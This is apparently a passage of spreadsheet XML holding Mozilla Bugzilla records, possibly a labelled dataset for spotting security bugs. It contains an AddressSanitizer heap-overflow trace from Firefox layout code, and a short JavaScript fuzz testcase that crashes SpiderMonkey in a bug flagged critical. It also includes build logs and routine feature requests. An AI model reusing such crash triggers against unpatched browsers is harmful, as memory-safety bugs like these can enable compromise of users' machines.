&gt;    #5 0x7f2a7269cc36 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
&gt;    #6 0x7f2a72699856 in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:395
&gt;    #7 0x7f2a726cf77d in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:840
&gt;    #8 0x7f2a7238d9b2 in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) src/layout/generic/nsBlockFrame.cpp:3725
&gt;    #9 0x7f2a72387fd6 in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) src/layout/generic/nsBlockFrame.cpp:3522
&gt;    #10 0x7f2a7237abea in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3376
&gt;    #11 0x7f2a72369ecb in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2483
&gt;    #12 0x7f2a72350be8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2000
&gt;    #13 0x7f2a72343dd4 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1043
&gt;    #14 0x7f2a723d2921 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:268
&gt;    #15 0x7f2a72374ec6 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3101
&gt;    #16 0x7f2a72369bea in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2480
&gt;    #17 0x7f2a72350be8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2000
&gt;    #18 0x7f2a72343dd4 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1043
&gt;    #19 0x7f2a724327cd in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:953
&gt;    #20 0x7f2a725fd5a7 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:493
&gt;    #21 0x7f2a724327cd in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:953
&gt;    #22 0x7f2a72576746 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:433
&gt;    #23 0x7f2a7257af47 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:533
&gt;    #24 0x7f2a7257f397 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:774
&gt;    #25 0x7f2a724327cd in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:953
&gt;    #26 0x7f2a72971a8b in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
&gt;    #27 0x7f2a72090215 in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7558
&gt;    #28 0x7f2a720c0a6d in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7699
&gt;    #29 0x7f2a720bf13d in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) src/layout/base/nsPresShell.cpp:3907
&gt;    #30 0x7f2a720bd4d3 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3757
&gt;    #31 0x7f2a71eb687f in nsDocumentViewer::LoadComplete(tag_nsresult) src/layout/base/nsDocumentViewer.cpp:990
&gt;    #32 0x7f2a7a48bb7e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) src/docshell/base/nsDocShell.cpp:6514
&gt;    #33 0x7f2a7a48344b in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6342
&gt;    #34 0x7f2a7a4843cb in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6349
&gt;    #35 0x7f2a7a59707f in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:1305
&gt;    #36 0x7f2a7a594632 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:885
&gt;    #37 0x7f2a7a58d8fe in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:775
&gt;    #38 0x7f2a7a591f95 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:659
&gt;    #39 0x7f2a7a5937cb in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:663
&gt;    #40 0x7f2a6ff667c1 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) src/netwerk/base/src/nsLoadGroup.cpp:676
&gt;    #41 0x7f2a73ae0290 in nsDocument::DoUnblockOnload() src/content/base/src/nsDocument.cpp:7361
&gt;    #42 0x7f2a73adfe41 in nsDocument::UnblockOnload(bool) src/content/base/src/nsDocument.cpp:7303
&gt;    #43 0x7f2a73a88cb3 in nsDocument::DispatchContentLoadedEvents() src/content/base/src/nsDocument.cpp:4280
&gt;    #44 0x7f2a73b83272 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:367
&gt;    #45 0x7f2a7f4d1c3f in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #46 0x7f2a7f146495 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:237
&gt;    #47 0x7f2a7cb7cadc in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #48 0x7f2a7f7c35f2 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #49 0x7f2a7f7c3429 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #50 0x7f2a7f7c32fe in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #51 0x7f2a7bf6f317 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #52 0x7f2a7aa9b575 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #53 0x7f2a6fce5284 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
&gt;    #54 0x7f2a6fceae6a in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
&gt;    #55 0x7f2a6fcedc30 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4088
&gt;    #56 0x41dad6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
&gt;    #57 0x41b2f0 in main src/browser/app/nsBrowserApp.cpp:279
&gt;    #58 0x7f2a90abb76c in
&gt;0x7f2a4ada32cc is located 0 bytes to the right of 204-byte region [0x7f2a4ada3200,0x7f2a4ada32cc)
&gt;allocated by thread T0 here:
&gt;    #0 0x40fbd2 in __interceptor_malloc
&gt;    #1 0x7f2a91ad8604 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
&gt;    #2 0x7f2a7fc567c8 in operator new[](unsigned long) src/../../dist/include/mozilla/mozalloc.h:212
&gt;    #3 0x7f2a7fc567c8 in gfxSkipChars::BuildShortcuts() src/gfx/thebes/gfxSkipChars.cpp:25
&gt;    #4 0x7f2a7fb582bf in gfxSkipChars::TakeFrom(gfxSkipChars*) src/gfx/thebes/gfxSkipChars.h:106
&gt;    #5 0x7f2a7fb57af3 in gfxTextRun::gfxTextRun(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) src/gfx/thebes/gfxFont.cpp:4568
&gt;    #6 0x7f2a7fb3a5db in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) src/gfx/thebes/gfxFont.cpp:4551
&gt;    #7 0x7f2a7fb3dc84 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) src/gfx/thebes/gfxFont.cpp:3592
&gt;    #8 0x7f2a72840dab in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) src/layout/generic/nsTextFrameThebes.cpp:555
&gt;    #9 0x7f2a72835bc5 in BuildTextRunsScanner::BuildTextRunForFrames(void*) src/layout/generic/nsTextFrameThebes.cpp:2052
&gt;    #10 0x7f2a7282ab47 in BuildTextRunsScanner::FlushFrames(bool, bool) src/layout/generic/nsTextFrameThebes.cpp:1411
&gt;    #11 0x7f2a7283a6fe in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1603
&gt;    #12 0x7f2a7283b145 in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1643
&gt;    #13 0x7f2a7284e807 in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) src/layout/generic/nsTextFrameThebes.cpp:1314
&gt;    #14 0x7f2a72849f2c in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) src/layout/generic/nsTextFrameThebes.cpp:2468
&gt;    #15 0x7f2a728d4339 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsTextFrameThebes.cpp:7816
&gt;    #16 0x7f2a726cfc69 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:847
&gt;    #17 0x7f2a7269fc7d in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
&gt;    #18 0x7f2a7269cc36 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
&gt;    #19 0x7f2a72699856 in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:395
&gt;    #20 0x7f2a726cf77d in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:840
&gt;    #21 0x7f2a7238d9b2 in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) src/layout/generic/nsBlockFrame.cpp:3725
&gt;    #22 0x7f2a72387fd6 in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) src/layout/generic/nsBlockFrame.cpp:3522
&gt;    #23 0x7f2a7237abea in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3376
&gt;    #24 0x7f2a72369ecb in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2483
&gt;    #25 0x7f2a72350be8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2000
&gt;    #26 0x7f2a72343dd4 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1043
&gt;    #27 0x7f2a723d2921 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:268
&gt;    #28 0x7f2a72374ec6 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3101
&gt;    #29 0x7f2a72369bea in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2480
&gt;    #30 0x7f2a72350be8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2000
&gt;Shadow bytes around the buggy address:
&gt;  0x1fe5495b4600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b4610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b4620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b4630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b4640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;=&gt;0x1fe5495b4650: 00 00 00 00 00 00 00 00 00[04]fb fb fb fb fb fb
&gt;  0x1fe5495b4660: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
&gt;  0x1fe5495b4670: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
&gt;  0x1fe5495b4680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b4690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1fe5495b46a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;Stats: 250M malloced (538M for red zones) by 403569 calls
&gt;Stats: 47M realloced by 24065 calls
&gt;Stats: 225M freed by 283304 calls
&gt;Stats: 113M really freed by 208600 calls
&gt;Stats: 612M (612M-0M) mmaped; 153 maps, 0 unmaps
&gt;  mmaps   by size class: 10:253890; 11:12282; 12:3072; 13:1536; 14:1280; 15:256; 16:1152; 17:1280; 18:48; 19:40; 20:24;
&gt;  mallocs by size class: 10:374083; 11:19834; 12:2763; 13:1873; 14:1627; 15:435; 16:1456; 17:1366; 18:70; 19:40; 20:22;
&gt;  frees   by size class: 10:258335; 11:17089; 12:1638; 13:1639; 14:1453; 15:310; 16:1376; 17:1349; 18:58; 19:38; 20:19;
&gt;  rfrees  by size class: 10:193497; 11:10852; 12:866; 13:748; 14:834; 15:188; 16:977; 17:607; 18:26; 19:4; 20:1;
&gt;Stats: malloc large: 1498 small slow: 4502
&gt;Stats: StackDepot: 0 ids; 0M mapped
&gt;==20823== ABORTING
&gt;</t>
        </is>
      </c>
      <c r="X3234" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3235">
      <c r="A3235" t="n">
        <v>541255</v>
      </c>
      <c r="B3235" t="inlineStr">
        <is>
          <t>2010-01-21 16:20:15 -0800</t>
        </is>
      </c>
      <c r="C3235" t="inlineStr">
        <is>
          <t>Crash [@ js_GC] or "Assertion failure: obj-&gt;isDenseArray(), at ../jsarray.cpp"</t>
        </is>
      </c>
      <c r="D3235" t="inlineStr">
        <is>
          <t>2013-01-10 16:36:31 -0800</t>
        </is>
      </c>
      <c r="E3235" t="n">
        <v>1</v>
      </c>
      <c r="F3235" t="n">
        <v>1</v>
      </c>
      <c r="G3235" t="n">
        <v>3</v>
      </c>
      <c r="H3235" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3235" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3235" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3235" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3235" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3235" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed-in-tracemonkey][ccbr]</t>
        </is>
      </c>
      <c r="Q3235" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3235" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3235" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3235" t="n">
        <v>1</v>
      </c>
      <c r="U3235" t="n">
        <v>0</v>
      </c>
      <c r="V3235" t="n">
        <v>28</v>
      </c>
      <c r="W3235" t="inlineStr">
        <is>
          <t>(function(e) {
  eval("\
    [(function() {\
      x.k = function(){}\
    })() \
    for (x in [0])]\
  ")
})()
asserts js debug shell without -j on TM tip at Assertion failure: OBJ_IS_DENSE_ARRAY(cx, obj), at ../jsarray.cpp:2290
autoBisect shows this is probably related to bug 452498:
The first bad revision is:
changeset:   26784:2cf0bbe3772a
user:        Brendan Eich
date:        Sun Apr 05 21:17:22 2009 -0700
summary:     upvar2, aka the big one take 2 (452598, r=mrbkap).</t>
        </is>
      </c>
      <c r="X3235" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3236">
      <c r="A3236" t="n">
        <v>620271</v>
      </c>
      <c r="B3236" t="inlineStr">
        <is>
          <t>2010-12-19 12:40:16 -0800</t>
        </is>
      </c>
      <c r="C3236" t="inlineStr">
        <is>
          <t>Use unittest errorparser on opt builds, too</t>
        </is>
      </c>
      <c r="D3236" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3236" t="n">
        <v>1</v>
      </c>
      <c r="F3236" t="n">
        <v>1</v>
      </c>
      <c r="G3236" t="n">
        <v>5</v>
      </c>
      <c r="H3236" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3236" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3236" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3236" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3236" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3236" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3236" t="inlineStr">
        <is>
          <t>[tinderbox]</t>
        </is>
      </c>
      <c r="Q3236" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3236" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3236" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3236" t="n">
        <v>1</v>
      </c>
      <c r="U3236" t="n">
        <v>0</v>
      </c>
      <c r="V3236" t="n">
        <v>5</v>
      </c>
      <c r="W3236" t="inlineStr">
        <is>
          <t>For debug builds (and, I think, absolutely everything else) we use ep_unittest.pl, which knows about TEST-UNEXPECTED-FAIL, but for opt builds, even though they run make check we use ep_unix.pl on all platforms, which does not. So http://tbpl.mozilla.org/?tree=MozillaTry&amp;rev=453160ce2421 (with an appropriate number of down-arrow clicks to get back to Saturday evening) is an intentional break of make check, where tbpl picks up the error message for the debug failures, and for the opt failures only gets
make[5]: *** [check] Error 255
make[5]: Leaving directory `/builds/slave/try-lnx/build/obj-firefox/toolkit/components/places/tests/cpp'
make[4]: *** [check] Error 2
make[4]: Leaving directory `/builds/slave/try-lnx/build/obj-firefox/toolkit/components/places/tests'
make[3]: *** [check] Error 2
make[3]: Leaving directory `/builds/slave/try-lnx/build/obj-firefox/toolkit/components/places'
make[2]: *** [check] Error 2
make[2]: Leaving directory `/builds/slave/try-lnx/build/obj-firefox/toolkit/components'
make[1]: *** [check] Error 2
make[1]: Leaving directory `/builds/slave/try-lnx/build/obj-firefox/toolkit'
make: *** [check] Error 2
Unknown Error: command finished with exit code: 2</t>
        </is>
      </c>
      <c r="X3236" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3237">
      <c r="A3237" t="n">
        <v>1371250</v>
      </c>
      <c r="B3237" t="inlineStr">
        <is>
          <t>2017-06-08 05:06:09 -0700</t>
        </is>
      </c>
      <c r="C3237" t="inlineStr">
        <is>
          <t>add bbouvier to the sheriffs list for helping out with AWFY performance alerts</t>
        </is>
      </c>
      <c r="D3237" t="inlineStr">
        <is>
          <t>2017-06-08 05:24:45 -0700</t>
        </is>
      </c>
      <c r="E3237" t="n">
        <v>1</v>
      </c>
      <c r="F3237" t="n">
        <v>1</v>
      </c>
      <c r="G3237" t="n">
        <v>7</v>
      </c>
      <c r="H3237" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3237" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3237" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3237" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3237" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3237" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3237" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3237" t="inlineStr"/>
      <c r="Q3237" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3237" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3237" t="n">
        <v>1</v>
      </c>
      <c r="U3237" t="n">
        <v>0</v>
      </c>
      <c r="V3237" t="n">
        <v>2</v>
      </c>
      <c r="W3237" t="inlineStr">
        <is>
          <t>It would help as there is a need to have more eyes on AWFY and the existing perf sheriffs can help out, but might not be able to do it all.</t>
        </is>
      </c>
      <c r="X3237" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3238">
      <c r="A3238" t="n">
        <v>489211</v>
      </c>
      <c r="B3238" t="inlineStr">
        <is>
          <t>2009-04-20 12:28:05 -0700</t>
        </is>
      </c>
      <c r="C3238" t="inlineStr">
        <is>
          <t>website: add pagination to top of All/All</t>
        </is>
      </c>
      <c r="D3238" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E3238" t="n">
        <v>1</v>
      </c>
      <c r="F3238" t="n">
        <v>1</v>
      </c>
      <c r="G3238" t="n">
        <v>6</v>
      </c>
      <c r="H3238" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3238" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J3238" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K3238" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3238" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3238" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3238" t="inlineStr"/>
      <c r="Q3238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3238" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3238" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T3238" t="n">
        <v>1</v>
      </c>
      <c r="U3238" t="n">
        <v>0</v>
      </c>
      <c r="V3238" t="n">
        <v>4</v>
      </c>
      <c r="W3238" t="inlineStr">
        <is>
          <t>please echo the paging widget (e.g. Page: [1] [2][3] Next) at the top of the display as well</t>
        </is>
      </c>
      <c r="X3238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3239">
      <c r="A3239" t="n">
        <v>656752</v>
      </c>
      <c r="B3239" t="inlineStr">
        <is>
          <t>2011-05-12 14:05:16 -0700</t>
        </is>
      </c>
      <c r="C3239" t="inlineStr">
        <is>
          <t>WebGL crash [@gleRunVertexSubmitImmediate()]</t>
        </is>
      </c>
      <c r="D3239" t="inlineStr">
        <is>
          <t>2013-12-27 14:37:02 -0800</t>
        </is>
      </c>
      <c r="E3239" t="n">
        <v>1</v>
      </c>
      <c r="F3239" t="n">
        <v>1</v>
      </c>
      <c r="G3239" t="n">
        <v>3</v>
      </c>
      <c r="H3239" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3239" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3239" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3239" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3239" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3239" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3239" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3239" t="inlineStr">
        <is>
          <t>[sg:high] arbitrary memory read [4.0.x ridealong?]</t>
        </is>
      </c>
      <c r="Q3239" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3239" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3239" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3239" t="n">
        <v>1</v>
      </c>
      <c r="U3239" t="n">
        <v>0</v>
      </c>
      <c r="V3239" t="n">
        <v>18</v>
      </c>
      <c r="W3239" t="inlineStr">
        <is>
          <t>Created attachment 532023
testcase
Environment:
ProductName:	Mac OS X
ProductVersion:	10.6.7
BuildVersion:	10J869
OpenGL renderer string: NVIDIA GeForce GT 330M OpenGL Engine
OpenGL version string: 2.1 NVIDIA-1.6.26
and 
OpenGL renderer string: ATI Radeon HD 6750M OpenGL Engine
OpenGL version string: 2.1 ATI-1.6.32</t>
        </is>
      </c>
      <c r="X3239" t="n">
